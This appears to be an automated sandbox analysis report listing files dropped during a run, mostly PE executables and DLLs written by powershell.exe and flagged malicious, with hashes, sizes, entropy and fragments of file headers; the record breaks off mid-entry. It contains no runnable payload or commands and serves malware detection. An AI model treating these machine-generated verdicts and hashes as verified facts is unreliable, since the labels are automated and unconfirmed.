.F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 11:20:52 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2679
    Entropy (8bit):4.006399267760742
    Encrypted:false
    SSDEEP:
    MD5:5EAB89E5356AB30606806F22E70E344B
    SHA1:DC51DBBB25229B3EC3D340C7F6B09CB51B5E9523
    SHA-256:12646E2950A05A64CBE4B873080441A2AA2A326908D743AC2D8DDDC3C34EC94D
    SHA-512:2D505410CA4850C4F8EF62A6CDA0B5E7A1D5F2A4DB83B339E74597C9CFF88BD1242F4B09A1BF6808BF85AD54677C2C05A9FB000A9C57C3FEC814EB62FB60B827
    Malicious:false
    Reputation:unknown
    Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.b....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.b....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.b...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.b...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............O......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2693
    Entropy (8bit):4.013964885625176
    Encrypted:false
    SSDEEP:
    MD5:35DEE37D0CAD48466D20F1800D257321
    SHA1:8E290541E27C80EA0AE68FECE9917BC503551013
    SHA-256:31347A2BAD522BA7A102244EC9FA59920F5206C5DC1FA21E6353A8849191A5BD
    SHA-512:C68AE31583C4247F58697B5CCD0A48526716EBA08CB05947DBF9443F432117F9D345E7071FB97BEBE9A2B18728E972B9C40EF290654F9F027522C1C3D058EC17
    Malicious:false
    Reputation:unknown
    Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.b....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.b....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.b...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............O......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 11:20:52 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2681
    Entropy (8bit):4.002038476798485
    Encrypted:false
    SSDEEP:
    MD5:CBF8459391233B9E4EB744187C67E99D
    SHA1:2D01F19079E818B60C47385BC8E965C5C80FFA54
    SHA-256:DAE77B232E692018ED044F1CEAAF02AE147DCD30A5B521D19FF406D5D50DA1A5
    SHA-512:C642C67BA26BDFADFFA179CB7FB6625EABD602609A35278B46B49FF79B9DEA1FBB163C1778A4192F54672E0A9557D94BE2C48F4694A0FA43B306DDFC353CD4CB
    Malicious:false
    Reputation:unknown
    Preview:L..................F.@.. ...$+.,....a...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.b....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.b....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.b...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.b...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............O......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 11:20:52 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2681
    Entropy (8bit):3.994499515507126
    Encrypted:false
    SSDEEP:
    MD5:03A2CFA897290483665284EBDC244446
    SHA1:24E7EA77726840CCC73072B58B6FEB6A9BD21C88
    SHA-256:6FA27D862F1071C4F2D38377B6817DE44EC37C76E6C388E6F971D09769D01AD1
    SHA-512:BFCE9EAB610956A924F07EB87313D2F5A478ED1AE0A2BF76190134FEF24E0C809473F21961BBBBB4C09A01C1D9A2E0DCB915FD38EFFB6B44E01018F71C0782FC
    Malicious:false
    Reputation:unknown
    Preview:L..................F.@.. ...$+.,.....Z..........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.b....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.b....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.b...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.b...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............O......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 11:20:51 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2683
    Entropy (8bit):4.004958878153689
    Encrypted:false
    SSDEEP:
    MD5:FC5002736A3B81F6FC8BD027B349C342
    SHA1:A6ABE59D8EA316C65F1BE8E78F38A8A72DA551BD
    SHA-256:5E61401D635954C9A80D633AB21970ADAB7D41F61679AC224B312FCB78A2F857
    SHA-512:5DE23FB726822693A0C1002C8192278B704AB39005B75A8833324EA6344753A46F5DB756ACF74755C308B2005D8683AC1DCCE8E8E93647F1A9759DC8B0E87399
    Malicious:false
    Reputation:unknown
    Preview:L..................F.@.. ...$+.,....L.q.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.b....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.b....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.b...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.b...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............O......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32 executable (console) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):766232
    Entropy (8bit):6.46742031055219
    Encrypted:false
    SSDEEP:
    MD5:79EAE4FA8DD7E1CA489E59AB19B4FBED
    SHA1:48EB42D40490AC4CE6C30245C631CC24718601C9
    SHA-256:E52553F941CEB9E715D239E7A211501CE5D6096EEEB90FB161B7BFEDF6A61DAB
    SHA-512:F8AE33F15F9FA00C7B5786119C452722EDEB9FA39350E7087CD86CE732BBD0571DBE2C9B96ED813770E9401BF4BED53362659D763BE66C85A68FA912DCB3C625
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v66L2WX.2WX.2WX.y/[.8WX.y/]..WX.y/\.&WX.4.]..WX.4.\. WX.4.[.&WX.;/..0WX.y/Y.5WX.2WY.CWX.].P.3WX.]..3WX.].Z.3WX.Rich2WX.........................PE..L....G.f...............&.....r.......j.......0....@.......................................@.....................................d......................../..........H...T...............................@............0...............................text...c........................... ..`.rdata..~....0......................@..@.data...............................@....rsrc...............................@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Category:dropped
    Size (bytes):50968
    Entropy (8bit):5.944269629896292
    Encrypted:false
    SSDEEP:
    MD5:740DCC24BA59F6205DE3D5C5575A19A7
    SHA1:2A911E51BB2571F5792C49008A2A2103FC0ED0AD
    SHA-256:6A4A987548A8FA13C8678FDAE921C2084A92048E6002400D5C48D695C502E0BD
    SHA-512:E652043DA39B4FE631E428D8422B642CF3BCAB0B2068BEFA7056CFC8C601CFA95F7C6FAA552F53DC3F773834D192B3EDA7F69BDB78ECE6BB0CB9278779CD8D24
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..2O..2O..2O..;7..6O..4..6O..4..&O..4..:O..4..1O..y7..?O..2O..{O..]..3O..]..3O..].B.3O..]..3O..Rich2O..........................PE..d...sK.f.........." ...&.2...h.......5..............................................S.....`.........................................`...........................\......../......8....k..T...........................Pj..@............P..h............................text....0.......2.................. ..`.rdata..DB...P...D...6..............@..@.data................z..............@....pdata..\...........................@..@.rsrc...............................@..@.reloc..8...........................@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):764696
    Entropy (8bit):6.46605957265092
    Encrypted:false
    SSDEEP:
    MD5:789952F58D76B2F41E8EADD9FAE66906
    SHA1:AB0324A701404A1818FD0C3E49F0706108F3C5AE
    SHA-256:3C92D3E88C5B9DB5D0E655F72E20682B43C5E96CB939C0C7576883A10ADE18FD
    SHA-512:FD380FF7C64576A112B994BDCB7E645C34D5D6378F1A921B2342AD7A00F57D7E8C485BBA03C20A6E7B143493E83DF7EA0CC31B31C763571BA7F0268D660D391A
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:+c.~J..~J..~J..52..tJ..52...J..52..jJ..x...XJ..x...lJ..x...jJ..w2..|J..52..wJ..~J...J.......J.......J.......J..Rich~J..........................PE..L....G.f...............&.....t......@j....... ....@.................................$6....@....................................x....................|.../..............T...............................@............ ...............................text...s........................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):71448
    Entropy (8bit):6.244392352614308
    Encrypted:false
    SSDEEP:
    MD5:28D2A0405BE6DE3D168F28109030130C
    SHA1:7151ECCBD204B7503F34088A279D654CFE2260C9
    SHA-256:2DFCAEC25DE17BE21F91456256219578EAE9A7AEC5D21385DEC53D0840CF0B8D
    SHA-512:B87F406F2556FAC713967E5AE24729E827F2112C318E73FE8BA28946FD6161802DE629780FAD7A3303CF3DBAB7999B15B535F174C85B3CBB7BB3C67915F3B8D0
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l[.~...~...~.......~.......~.......~.......~.......~.......~.......~...~..=~.......~.......~.......~.......~..Rich.~..................PE..d...wK.f.........." ...&.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...%d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...h...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):85272
    Entropy (8bit):6.581027304618609
    Encrypted:false
    SSDEEP:
    MD5:223FD6748CAE86E8C2D5618085C768AC
    SHA1:DCB589F2265728FE97156814CBE6FF3303CD05D3
    SHA-256:F81DC49EAC5ECC528E628175ADD2FF6BDA695A93EA76671D7187155AA6326ABB
    SHA-512:9C22C178417B82E68F71E5B7FE7C0C0A77184EE12BD0DC049373EACE7FA66C89458164D124A9167AE760FF9D384B78CA91001E5C151A51AD80C824066B8ECCE6
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d....K.f.........." ...&.....^...............................................`.......b....`.............................................H............@.......0..8......../...P..........T...........................p...@............................................text............................... ..`.rdata...>.......@..................@..@.data........ ......................@....pdata..8....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):125208
    Entropy (8bit):6.122025398643493
    Encrypted:false
    SSDEEP:
    MD5:BBD5533FC875A4A075097A7C6ABA865E
    SHA1:AB91E62C6D02D211A1C0683CB6C5B0BDD17CBF00
    SHA-256:BE9828A877E412B48D75ADDC4553D2D2A60AE762A3551F9731B50CAE7D65B570
    SHA-512:23EF351941F459DEE7ED2CEBBAE21969E97B61C0D877CFE15E401C36369D2A2491CA886BE789B1A0C5066D6A8835FD06DB28B5B28FB6E9DF84C2D0B0D8E9850E
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&e..b..b..b..k|H.d..d..`..d..n..d..j..d..f.....`..)|.c..)|.d...x.a..b........d.....c....$.c.....c..Richb..................PE..d....K.f.........." ...&............\_..............................................j.....`.........................................``.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..Xl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):37144
    Entropy (8bit):6.534690543709126
    Encrypted:false
    SSDEEP:
    MD5:DE7F1806F2B9154850C69A7D91131F44
    SHA1:8B1D3657742B455A67B10520742DBAFAB57548B6
    SHA-256:F24A4A747D4384AF7D7716CEF4DE8B161F905FEE65D473828D66E97ADC7A92C4
    SHA-512:2904EC99CCFCABF2154A113AB5BB3BB42611F05F8CDCC3DDDFA037390B188ACA4D27B2EFDC23844547F26683FC71CAF7300164931E43056422E8ECF4F3066607
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..(..(..(..!.M.$...0.*...0.%...0. ...0.+..G0.*..c..-..(.....G0.)..G0.)..G0!.)..G0.)..Rich(..........PE..d...eK.f.........." ...&.*...:.......-...............................................#....`..........................................L......`Z.......................b.../......P...PE..T............................D..@............@...............................text...H(.......*.................. ..`.rdata... ...@..."..................@..@.data........p.......P..............@....pdata...............R..............@..@.rsrc................V..............@..@.reloc..P............`..............@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):251672
    Entropy (8bit):6.565757128183933
    Encrypted:false
    SSDEEP:
    MD5:3055EDF761508190B576E9BF904003AA
    SHA1:F0DC8D882B5CD7955CC6DFC8F9834F70A83C7890
    SHA-256:E4104E47399D3F635A14D649F61250E9FD37F7E65C81FFE11F099923F8532577
    SHA-512:87538FE20BD2C1150A8FEFD0478FFD32E2A9C59D22290464BF5DFB917F6AC7EC874F8B1C70D643A4DC3DD32CBE17E7EA40C0BE3EA9DD07039D94AB316F752248
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...yK.f.........." ...&.p...<......................................................i ....`..........................................D..P....E..................`'......./......T.......T...........................@...@............................................text...9o.......p.................. ..`.rdata..H............t..............@..@.data...X*...`...$...L..............@....pdata..`'.......(...p..............@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):133400
    Entropy (8bit):6.437312765343779
    Encrypted:false
    SSDEEP:
    MD5:B479ED301E990690A30FC855E6B45F94
    SHA1:177B508A602C5662350DAE853B5E9DB1475908A7
    SHA-256:0C488E6883A70CD54A71A9E28796F87EF6CC0D288260A965CBB24BF1D7309A20
    SHA-512:D410355BFE39A7666E7297D3654B0B8DD3919D4AE3BBF7D258ACDF76276ECC3BA3718F09BA708E3103D367EA6D352E98B6DE265E3746B973B421E0A68B8D37A8
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Oj.L..KL..KL..KEV.KB..KJ..JN..KJ..JA..KJ..JD..KJ..JO..K#..JN..K.V.JO..KL..K...K#..JH..K#..JM..K#..KM..K#..JM..KRichL..K........PE..d...{K.f.........." ...&.:..........|...............................................Z.....`.............................................X...X...x......................../......p....[..T............................Z..@............P...............................text....8.......:.................. ..`.rdata..Nk...P...l...>..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):65816
    Entropy (8bit):6.241463396742061
    Encrypted:false
    SSDEEP:
    MD5:EEDB6D834D96A3DFFFFB1F65B5F7E5BE
    SHA1:ED6735CFDD0D1EC21C7568A9923EB377E54B308D
    SHA-256:79C4CDE23397B9A35B54A3C2298B3C7A844454F4387CB0693F15E4FACD227DD2
    SHA-512:527BD7BB2F4031416762595F4CE24CBC6254A50EAF2CC160B930950C4F2B3F5E245A486972148C535F8CD80C78EC6FA8C9A062085D60DB8F23D4B21E8AE4C0AD
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.A:...:...:...3ca.>...<...8...<...6...<...2...<...9...U...8...qc..8.......9...:.......U...;...U...;...U...;...U...;...Rich:...........................PE..d....K.f.........." ...&.T..........L@..............................................lg....`.............................................P.............................../......X...@}..T............................|..@............p..(............................text...wS.......T.................. ..`.rdata..&O...p...P...X..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):160024
    Entropy (8bit):6.841300813767097
    Encrypted:false
    SSDEEP:
    MD5:05E8B2C429AFF98B3AE6ADC842FB56A3
    SHA1:834DDBCED68DB4FE17C283AB63B2FAA2E4163824
    SHA-256:A6E2A5BB7A33AD9054F178786A031A46EA560FAEEF1FB96259331500AAE9154C
    SHA-512:BADEB99795B89BC7C1F0C36BECC7A0B2CE99ECFD6F6BB493BDA24B8E57E6712E23F4C509C96A28BC05200910BEDDC9F1536416BBC922331CAE698E813CBB50B3
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MRu.MRu.MRu.D*..IRu.K.t.ORu.K.p.ARu.K.q.ERu.K.v.NRu.".t.NRu..*t.ORu.MRt.(Ru.".x.wRu.".u.LRu."..LRu.".w.LRu.RichMRu.........................PE..d....K.f.........." ...&.f...........8..............................................`3....`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text....d.......f.................. ..`.rdata..............j..............@..@.data...h....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):44824
    Entropy (8bit):6.251859814548239
    Encrypted:false
    SSDEEP:
    MD5:88D20E77E718FF62CE5F01BC6CBCEB88
    SHA1:8FE2A1FEED9A7D16DC61E7DED17F16080E43393F
    SHA-256:003F06B975E311A9725DBD53B199D42DFF25DF7F8B3AB93BB1AF56C321865FE0
    SHA-512:133DFBB4936CAAA3DA63EC515CE7431DBD3AAF81C405E86EE4FFDA23B6526287F71E5DB8914152110E1F8557B408497013905BE0B200BAA7CEA3F1E5359D623A
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............s.M.s.M.s.M..|M.s.M...L.s.M...L.s.M...L.s.M...L.s.M...L.s.M...L.s.M.s.M.s.M...L.s.M...L.s.M...M.s.M...L.s.MRich.s.M........PE..d...}K.f.........." ...&.....T.......2..............................................d.....`.........................................@b..H....b.........................../...........W..T............................V..@............@...............................text....-.......................... ..`.rdata.......@...0...2..............@..@.data... ....p.......b..............@....pdata...............n..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):35096
    Entropy (8bit):6.457363388284004
    Encrypted:false
    SSDEEP:
    MD5:A4281E383EF82C482C8BDA50504BE04A
    SHA1:4945A2998F9C9F8CE1C078395FFBEDB29C715D5D
    SHA-256:467B0FEF42D70B55ABF41D817DFF7631FAEEF84DCE64F8AADB5690A22808D40C
    SHA-512:661E38B74F8BFDD14E48E65EE060DA8ECDF67C0E3CA1B41B6B835339AB8259F55949C1F8685102FD950BF5DE11A1B7C263DA8A3A4B411F1F316376B8AA4A5683
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......de.* ..y ..y ..y)|Fy"..y&..x"..y&..x-..y&..x(..y&..x#..yO..x"..y ..yB..yk|.x%..yO..x"..yO..x!..yO.*y!..yO..x!..yRich ..y........................PE..d...}K.f.........." ...&.....>......L...............................................=.....`.........................................0E..`....E..x............p.......Z.../...........4..T............................3..@............0...............................text............................... ..`.rdata..r ...0..."..."..............@..@.data...X....`.......D..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):55576
    Entropy (8bit):6.346382537794332
    Encrypted:false
    SSDEEP:
    MD5:BA368245D104B1E016D45E96A54DD9CE
    SHA1:B79EF0EB9557A0C7FA78B11997DE0BB057AB0C52
    SHA-256:67E6CA6F1645C6928ADE6718DB28AFF1C49A192E8811732B5E99364991102615
    SHA-512:429D7A1F829BE98C28E3DCA5991EDCADFF17E91F050D50B608A52EF39F6F1C6B36AB71BFA8E3884167371A4E40348A8CDA1A9492B125FB19D1A97C0CCB8F2C7B
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.{.2.(.2.(.2.(.J.(.2.(...).2.(...).2.(...).2.(...).2.(..).2.(.2.(.2.(.J.).2.(.J.).2.(..).2.(..).2.(.g(.2.(..).2.(Rich.2.(........PE..d...}K.f.........." ...&.L...`............................................................`.............................................X.............................../......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):32536
    Entropy (8bit):6.462349221807228
    Encrypted:false
    SSDEEP:
    MD5:6E0CB85DC94E351474D7625F63E49B22
    SHA1:66737402F76862EB2278E822B94E0D12DCB063C5
